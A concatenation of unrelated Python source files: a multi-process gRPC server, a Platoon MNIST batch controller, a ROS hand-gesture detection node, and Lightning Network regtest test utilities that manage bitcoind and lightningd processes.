return '{:d}m{:d}s'.format(minutes, seconds)
else:
return '{:d}s'.format(seconds)
class GracefulShutdown:
def __init__(self, logger):
self.logger = logger
self.event = Event()
signal.signal(signal.SIGINT, self.handler('SIGINT'))
signal.signal(signal.SIGTERM, self.handler('SIGTERM'))
signal.signal(signal.SIGHUP, self.handler('SIGHUP'))
def handler(self, signal_name):
def fn(signal_received, frame):
self.logger.info('signal received', extra={'signal': signal_name})
self.event.set()
return fn
class Config(object):
def __init__(self):
self.grpc_server_address = os.getenv('GRPC_SERVER_ADDRESS', '')
self.grpc_server_key = str.encode(os.getenv('GRPC_SERVER_KEY', ''))
self.grpc_server_cert = str.encode(os.getenv('GRPC_SERVER_CERT', ''))
self.grpc_root_ca = str.encode(os.getenv('GRPC_ROOT_CA', ''))
self.gprc_server_process_num = int(os.getenv('GPRC_SERVER_PROCESS_NUM', cpu_count()))
self.grpc_server_thread_num = int(os.getenv('GRPC_SERVER_THREAD_NUM', 1))
self.grpc_server_grace_period_in_secs = int(os.getenv('GRPC_SERVER_GRACE_PERIOD_IN_SECS', 2))
self.grpc_server_kill_period_in_secs = int(os.getenv('GRPC_SERVER_KILL_PERIOD_IN_SECS', 5))
class Server(object):
def __init__(self, config, logger):
self.config = config
self.logger = logger
@contextlib.contextmanager
def _reserve_port(self):
"""Find and reserve a port for all subprocesses to use"""
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
if sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT) == 0:
raise RuntimeError('failed to set SO_REUSEPORT.')
_, port = self.config.grpc_server_address.split(':')
sock.bind(('', int(port)))
try:
yield sock.getsockname()[1]
finally:
sock.close()
def _run_server(self, shutdown_event):
server_credentials = grpc.ssl_server_credentials(
[(self.config.grpc_server_key, self.config.grpc_server_cert)],
root_certificates=self.config.grpc_root_ca,
require_client_auth=True
)
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=self.config.grpc_server_thread_num),
options=[
("grpc.so_reuseport", 1),
("grpc.use_local_subchannel_pool", 1),
],
)
grpc_lib.add_ForecastServicer_to_server(ForecastServicer(self.logger), server)
server.add_secure_port(self.config.grpc_server_address, server_credentials)
self.logger.info('starting python gRPC server...')
server.start()
while not shutdown_event.is_set():
time.sleep(1)
server.stop(5).wait()
self.logger.info('python gRPC server stopped')
def serve(self):
with self._reserve_port():
procs = []
shutdown = GracefulShutdown(self.logger)
for _ in range(self.config.gprc_server_process_num):
proc = Process(target=self._run_server, args=(shutdown.event,))
procs.append(proc)
proc.start()
while not shutdown.event.is_set():
time.sleep(1)
t = time.time()
grace_period = self.config.grpc_server_grace_period_in_secs
kill_period = self.config.grpc_server_kill_period_in_secs
while True:
# Send SIGINT if process doesn't exit quickly enough, and kill it as last resort
# .is_alive() also implicitly joins the process (good practice in linux)
alive_procs = [proc for proc in procs if proc.is_alive()]
if len(alive_procs) == 0:
break
elapsed = time.time() - t
if elapsed >= grace_period and elapsed < kill_period:
for proc in alive_procs:
proc.terminate()
self.logger.info("sending SIGTERM to subprocess", extra={'proc': proc})
elif elapsed >= kill_period:
for proc in alive_procs:
self.logger.warning("sending SIGKILL to subprocess", extra={'proc': proc})
# Queues and other inter-process communication primitives can break when
# process is killed, but we don't care here
proc.kill()
time.sleep(1)
time.sleep(1)
for proc in procs:
self.logger.info("subprocess terminated", extra={'proc': proc})
def json_logger():
logger = logging.getLogger()
log_handler = logging.StreamHandler(sys.stdout)
formatter = jsonlogger.JsonFormatter(fmt='%(asctime)s %(name)s %(levelname)s %(message)s')
log_handler.setFormatter(formatter)
log_handler.flush = sys.stdout.flush
logger.setLevel(logging.INFO)
logger.addHandler(log_handler)
return logger
|
batched_pixel_sum_controller.py
|
from __future__ import absolute_import, print_function
import os
import sys
import gzip
import time
import six
from six.moves import cPickle
from multiprocessing import Process
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from platoon.channel import Controller
class BatchedPixelSumController(Controller):
def __init__(self, batch_port, dataset, batch_size, default_args):
super(BatchedPixelSumController, self).__init__(**default_args)
# The data socket should be initialized in the process that will handle
# the batch.
# That is why it's not initialized in the parent constructor. Second
# param = None
self._batch_port = batch_port
self._start_time = None
self._should_stop = False
self._batch_size = batch_size
self._dataset = dataset
self._nb_batch_processed = 0
self._nb_batch_to_process = (dataset.shape[0] // batch_size)
def start_batch_server(self):
self.p = Process(target=self._send_mb)
self.p.start()
def _send_mb(self):
self.init_data(self._batch_port)
for i in range(self._dataset.shape[0] // self._batch_size):
batch_start = i * self._batch_size
batch_stop = (i + 1) * self._batch_size
self.send_mb(self._dataset[batch_start:batch_stop])
self.asocket.close()
print("Done Sending MB.")
# TODO: Find a solution for this
# Sleeping to give the chance to the worker to empty the queue before
# the MB process dies
import time
time.sleep(2)
def handle_control(self, req, worker_id, req_info):
print("# Handling req: {}".format(req))
control_response = ''
if req == 'next':
if not self._should_stop:
# Start a global execution timer
if self._start_time is None:
self._start_time = time.time()
control_response = 'train'
else:
control_response = 'stop'
elif req == 'get_data_shape':
control_response = self._dataset[0].shape
elif req == 'done':
self._nb_batch_processed += req_info['num_batches']
print("{} batches processed by worker so far."
.format(self._nb_batch_processed))
if self._nb_batch_processed >= self._nb_batch_to_process:
if not self._should_stop:
print("Training time {:.4f}s".format(
time.time() - self._start_time))
self._should_stop = True
return control_response
def parse_arguments():
parser = Controller.default_parser()
parser.add_argument('--batch_port', default=5566, type=int, required=False,
help='Port on which the batches will be transfered.')
parser.add_argument('--batch-size', default=1000, type=int, required=False,
help='Size of the batches.')
return parser.parse_args()
def get_mnist(path):
import os
from six.moves import urllib
if not os.path.exists(path):
print("Downloading mnist ...", end=' ')
url = "http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz"
urllib.request.urlretrieve(url, path)
print("Done")
def spawn_controller():
args = parse_arguments()
mnist_path = "../data/mnist.pkl.gz"
get_mnist(mnist_path)
with gzip.open(mnist_path, 'rb') as f:
kwargs = {}
if six.PY3:
kwargs['encoding'] = 'latin1'
train_set, _, _ = cPickle.load(f, **kwargs)
controller = BatchedPixelSumController(batch_port=args.batch_port,
dataset=train_set[0],
batch_size=args.batch_size,
default_args=Controller.default_arguments(args))
controller.start_batch_server()
return controller.serve()
if __name__ == '__main__':
rcode = spawn_controller()
if rcode != 0:
sys.exit(rcode)
|
External_Processing.py
|
#!/usr/bin/env python
import cv2
import numpy as np
from utils import detector_utils as detector_utils
from utils import gesture_utils as gesture_utils
import datetime
from multiprocessing import Queue
import threading
import roslib
import rospy
import sys, time, os
from sensor_msgs.msg import CompressedImage
from std_msgs.msg import Int32MultiArray
import csv
import tensorflow as tf
#Display processed frames for debugging
DISPLAY_OUTPUT = True
#Write recorded hand paths to datafile for testing
RECORD_PATHS = False
#Write recorded paths to datafile with the gesture predicted by the network
PREDICT_GESTURE = False
#Track processing speed
TRACK_FPS = False
#Save output frames to video file
SAVE_OUTPUT = False
NUM_THREADS = 4
INPUT_QUEUE_SIZE = 1
output_path = 'output.avi'
input_lock = threading.Lock()
input_cv = threading.Condition(input_lock)
frame_lock = threading.Lock()
frame_cv = threading.Condition(frame_lock)
next_frame = 0 #Tracks the current frame number to reconstruct output in original order
TERMINATE = False
#Worker calls all functions to obtain the estimated gesture
def Assembler(worker_q, worker_frame_q, cap_params):
global DISPLAY_OUTPUT
global RECORD_PATHS
global PREDICT_GESTURE
global TERMINATE
global SAVE_OUTPUT, output_path
global next_frame
print("Assembler started!")
prediction = [4,4] #Initialize predition
prev_prediction = [4, 4]
#Load network to recognize gestures
model = gesture_utils.load_net(os.path.abspath(os.getcwd()))
#Initialize lastPos and lastOutput with default values
lastPos, lastOutput = gesture_utils.initialize()
start_time = None
frameCounter = 0 #To count elapsed frame
idleTimer = time.time()
PROCESSING = False
processing_stats = [[0,0,0],[0,0,0],[0,0,0],[0,0,0]] #(Total time, total frames, fps), frames with 0 hands, frames with 1 hand, frames with 2 hands
publisher = rospy.Publisher("gesture", Int32MultiArray, queue_size=1)
if SAVE_OUTPUT:
out = cv2.VideoWriter(output_path,cv2.VideoWriter_fourcc('M','J','P','G'),24,(int(cap_params['im_width']),int(cap_params['im_height'])))
while not (PROCESSING and (time.time() - idleTimer) > 10): #After starting, the Assembler exits after not receiving new info for 10 seconds
if not worker_q.empty():
PROCESSING = True #Becomes true when at least one frame has been received
idleTimer = time.time()
#print("Assembler acquired frame")
if start_time == None and TRACK_FPS: #Note time the first frame is processed
start_time = time.time()
#Obtain access to queue of worker output
frame_cv.acquire()
if DISPLAY_OUTPUT or SAVE_OUTPUT:
image_np = worker_frame_q.get()
worker_output = worker_q.get()
next_frame += 1
frame_cv.notifyAll()
frame_cv.release()
boxes = worker_output[0]
scores = worker_output[1]
positions = gesture_utils.find_hands(boxes, scores, cap_params) #Obtain center positions of max 2 most probable hands
if(len(positions) > 0): #If at least one hand is detected
lastPos, added_pos = gesture_utils.update_lastpos(positions,lastPos) #Append new position to closest previous position to keep hands separate
prediction, lastOutput, meanx, meany, predicted_gestures_raw = gesture_utils.predict_gestures(lastPos, cap_params,model, lastOutput, added_pos) #Obtain predicted gesture based on new input
print('Prediction: ' + str(prediction))
if prev_prediction[0] != prediction[0]:
print(prediction[0])
response = Int32MultiArray()
response.data = [prediction[0]]
publisher.publish(response)
prev_prediction[0] = prediction[0]
if prev_prediction[1] != prediction[1]:
response = Int32MultiArray()
response.data = [prediction[1]]
publisher.publish(response)
prev_prediction[1] = prediction[1]
if RECORD_PATHS: #If paths need to be recorded to CSV file
gesture_utils.write_path_to_datafile(lastPos, cap_params, meanx, meany, added_pos, predicted_gestures_raw, PREDICT_GESTURE)
if TRACK_FPS: #Track overall FPS as well as on specific cases
frame_time = time.time()-start_time
processing_stats[0][0] += frame_time
processing_stats[0][1] += 1
if len(positions) == 0:
processing_stats[1][0] += frame_time
processing_stats[1][1] += 1
elif len(positions) == 2:
processing_stats[2][0] += frame_time
processing_stats[2][1] += 1
else:
processing_stats[3][0] += frame_time
processing_stats[3][1] += 1
start_time = time.time()
if DISPLAY_OUTPUT or SAVE_OUTPUT: #If output frame should be created
image_np = gesture_utils.construct_output(image_np, cap_params, lastPos, prediction, scores, boxes) #Draw output frame with additional data to screen
if SAVE_OUTPUT:
out.write(image_np)
if DISPLAY_OUTPUT:
cv2.imshow('detected hands', image_np)
if cv2.waitKey(1) & 0xFF == ord('q'):
TERMINATE = True
pass
if processing_stats[0][1] - frameCounter == 10 and TRACK_FPS: #Update FPS and display
for i in range(0, len(processing_stats)):
if processing_stats[i][0] > 0:
processing_stats[i][2] = processing_stats[i][1] / processing_stats[i][0]
print(processing_stats)
frameCounter = processing_stats[0][1]
print('Assembler exiting')
TERMINATE = True
try:
input_cv.notifyAll()
except:
pass
if SAVE_OUTPUT:
out.release()
def Worker(input_q, frameNumber_q, worker_q, worker_frame_q, id):
global TERMINATE
idleTimer = time.time() #Saves time at start of last frame
PROCESSING = False #Indicates a video stream is being processed
msg_timer = time.time()
#Load hand recognition graph
detection_graph, sess = detector_utils.load_inference_graph()
while not (PROCESSING and (time.time() - idleTimer) > 10):
if not input_q.empty():
PROCESSING = True #Becomes true when at least one frame has been received
idleTimer = time.time()
input_cv.acquire()
while input_q.empty():
if TERMINATE:
input_cv.release()
break
input_cv.wait()
if TERMINATE:
break
image_np = input_q.get()
frameNumber = frameNumber_q.get()
input_cv.notifyAll()
input_cv.release()
image_np = cv2.cvtColor(image_np, cv2.COLOR_BGR2RGB) #Convert frame to correct color format
boxes, scores = detector_utils.detect_objects(image_np, detection_graph, sess) #Detect hands
frame_cv.acquire()
while frameNumber != next_frame:
frame_cv.wait()
worker_q.put([boxes, scores])
if DISPLAY_OUTPUT or SAVE_OUTPUT:
worker_frame_q.put(image_np)
frame_cv.release()
print("Worker "+str(id)+" exited")
class FrameProcessor:
frameNumber = 0
def __init__(self, input_q, frameNumber_q):
#self.detection_graph, self.sess = detector_utils.load_inference_graph()
self.receiver = rospy.Subscriber("compressed_image", CompressedImage, self.callback, queue_size=1)
self.input_q = input_q
self.frameNumber_q = frameNumber_q
self.output_q = output_q
self.framenumber = 0
def callback(self, ros_data):
#Prepare incoming frame
img = np.fromstring(ros_data.data, np.uint8)
img = cv2.imdecode(img, cv2.IMREAD_COLOR)
input_cv.acquire()
while input_q.qsize() >= INPUT_QUEUE_SIZE:
input_cv.wait()
input_q.put(img)
frameNumber_q.put(self.frameNumber)
input_cv.notifyAll()
input_cv.release()
self.frameNumber += 1
if __name__ == '__main__':
if RECORD_PATHS:
gesture_utils.initialize_datafile() #Initialize datafile if it does not exist yet
#Initialize queues
input_q = Queue(maxsize=INPUT_QUEUE_SIZE)
frameNumber_q = Queue(maxsize=INPUT_QUEUE_SIZE)
worker_q = Queue(maxsize=2)
worker_frame_q = Queue(maxsize=2)
output_q = Queue(maxsize=2)
#Create callback for when a frame comes in
fp = FrameProcessor(input_q, frameNumber_q)
rospy.init_node('Hand_detection_processing', anonymous=True)
#Initialize parameters
cap_params = {}
cap_params['im_width'] = 320
cap_params['im_height'] = 180
cap_params['score_thresh'] = 0.2
cap_params['num_hands_detect'] = 2
#Create and start worker thread(s)
worker_threads = []
for i in range(0,NUM_THREADS):
worker_threads.append(threading.Thread(target=Worker, args=(input_q, frameNumber_q, worker_q, worker_frame_q, i)))
worker_threads[i].start()
#Run assembler
Assembler(worker_q, worker_frame_q, cap_params)
#Clean up worker threads
for i in range(0, len(worker_threads)):
worker_threads[i].join()
cv2.destroyAllWindows()
sys.exit()
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[regtest]\n")
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
if self.proc.returncode:
raise ValueError("Process '{}' did not cleanly shutdown: return code {}".format(self.proc.pid, rc))
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
btc_conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(btc_conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=btc_conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
return proxy
def generate_block(self, numblocks=1):
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': 'regtest',
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.rpcproxy.start()
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)['address']
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {}'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['address']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
